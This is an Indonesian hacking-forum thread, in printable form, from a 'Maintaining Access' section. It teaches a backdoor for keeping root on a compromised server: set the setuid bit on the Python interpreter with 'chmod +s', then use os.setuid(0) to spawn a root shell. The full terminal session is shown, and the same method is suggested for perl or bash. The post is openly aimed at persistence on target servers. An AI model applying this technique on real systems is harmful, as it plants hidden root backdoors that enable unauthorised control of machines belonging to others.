BackBox Indonesia
Tanam rootkit tanpa menambahkan file/rootkit ke dalam server - Printable Version

+- BackBox Indonesia (http://www.backboxindonesia.or.id)
+-- Forum: Attacking (http://www.backboxindonesia.or.id/forum-12.html)
+--- Forum: Maintaining Access (http://www.backboxindonesia.or.id/forum-20.html)
+--- Thread: Tanam rootkit tanpa menambahkan file/rootkit ke dalam server (/thread-232.html)



Tanam rootkit tanpa menambahkan file/rootkit ke dalam server - koboi - 11-18-2017

Oke kali ini saya coba sharing trik sederhana cara menanam rootkit tanpa upload rootkit/file ke dalam server.
Gimana caranya?? Ko bisa?? Penasaran bukan??

Mungkin bagi kalian yang terbiasa menggunakan python trik ini sangatlah mudah dan sangat sederhana, kita tinggal menambahkan hak akses sticky bit ke dalam suatu file. Dalam contoh kali ini saya menambahkan hak akses sticky bit ke dalam file python sendiri.
Caranya cukup mudah, kita tinggal ketikan perintah "chmod +s" menggunakan user root. Sebagai contoh perintahnya seperti ini

Code:
$ chmod +s /usr/bin/python2.7

Lalu apa yang harus kita lakukan setelah merubah hak akses file tersebut??
Caranya kita tinggal masuk ke shell interactive python kemudian kita setuid menjadi 0. Perintahnya kurang lebih seperti ini

Code:
$ id
uid=1000(user) gid=1000(user) groups=1000(user)
$ python
Python 2.7.14 (default, Sep 23 2017, 22:06:14)
[GCC 7.2.0] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import os
>>> os.setuid(0)
>>> os.setgid(0)
>>> os.system('id')
uid=0(root) gid=0(root) groups=0(root),1000(user)
>>> os.system('/bin/bash')
$ id
uid=0(root) gid=0(root) groups=0(root),1000(user)

Cukup mudah bukan??
Sebelumnya saya pernah share juga cara menanam rootkit ke dalam server dengan mengupload program suid di sini. Kali ini caranya cukup sederhana banget bukan. :)

Catetan : karena kita menambahkan hak akses ke dalam program python, kita harus cek terlebih dahulu apakah di server target sudah terinstall python atau belum. kalo belum kita tinggal install saja pythonnya, kan udah dapet akses rootnya??
Atau kalo kalian pengen nginjeksi ke perl, bash, atau yang lainnya juga bisa ko :) tinggal atur" aja enaknya kita simpen di mana rootkit. hehe

Mungkin cukup sekian tutorial dari saya.
Semoga tutorialnya bermanfaat. :)


RE: Tanam rootkit tanpa menambahkan file/rootkit ke dalam server - purplepinger - 01-05-2018

mantap bangs thanks jaya salalu